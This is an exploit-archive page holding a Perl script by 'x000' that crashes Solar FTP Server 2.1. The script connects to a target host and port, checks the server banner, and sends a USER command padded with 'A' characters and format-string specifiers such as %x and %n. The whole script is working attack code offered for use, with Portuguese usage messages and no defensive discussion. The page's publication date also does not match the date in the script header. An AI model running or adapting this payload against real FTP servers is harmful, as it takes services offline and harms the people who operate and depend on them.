Solar FTP 2.1 Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solar FTP 2.1 Denial of Service Exploit
# Published : 2011-02-22
# Author : x000
# Previous Title : Red Hat Linux stickiness of /tmp
# Next Title : WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability

#!/usr/bin/perl
#
#[+]Exploit Titulo: Exploit Denial of Service Solar FTP 2.1
#[+]Data: 21/10/2011
#[+]Autor: x000
#[+]Vers?o: 2.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN 
#[+]CVE: N/A
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx  
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                    
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx   
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
#
#
#               Link de Download: http://solarftp.com/files/solarftps-setup.exe
#
#             .: Criador  by: x000 :.
#              3d3n@hotmail.com.br
#                 www.x000.org
#       Obrigado C4SS!0 G0M3S Friends Forever
#


use Socket;
use IO::Socket;
use strict;
use warnings;

my $sys = `ver`;

if($sys=~/Windows/){
system("cls");
system("color 4f");
}
else{
system("clear");
}
sub usage{
print q
{
               00    00  000000    000000    000000
                00  00  00000000  00000000  00000000
                 0000   0      0  0      0  0      0
                0000    0      0  0      0  0      0
               00  00   00000000  00000000  00000000
              00    00   000000    000000    000000
               
                      | Criador x000 |

               | Contato: 3d3n@hotmail.com.br |

                      |  From Brazil |

                    | Site www.x000.org |


};
}

if($#ARGV!=1){
usage;
print "tt[-]Modo de Uso: perl $0 <Host> <Porta>n";
print "tt[-]Exemplo:perl $0 192.168.1.12 21n";
exit;
}

usage;
print "tt[+]Conectando ao Servidor $ARGV[0]...nn";
sleep(1);

my $exploit = "A" x 50;
$exploit = $exploit."%x%lf%f%d%c%s%c%u%n%s%c%lf%tt%d%c";


my $sock = IO::Socket::INET->new(
PeerAddr=>$ARGV[0],
PeerPort=>int($ARGV[1]),
Timeout=>1,
Proto=>"tcp",
)or die("ERRO:n$!n");

print "tt[+]Checando se o Servidor e Vulneravelnn";
sleep(1);


$sock->recv(my $data,2000);
unless($data=~/Solar FTP Server/){
print "tt[+]Servidor Nao e Vulneravel:(nn";
sleep(1);
exit;
}
print "tt[+]Servidor Vulneravel:)nn";
sleep(1);

print "tt[+]Enviando Exploit Denial of Servicenn";
sleep(1);
$sock->send("USER $exploitrn");
close($sock);
print "tt[+]Exploit Denial Of Service Enviado:)n";

# x000.org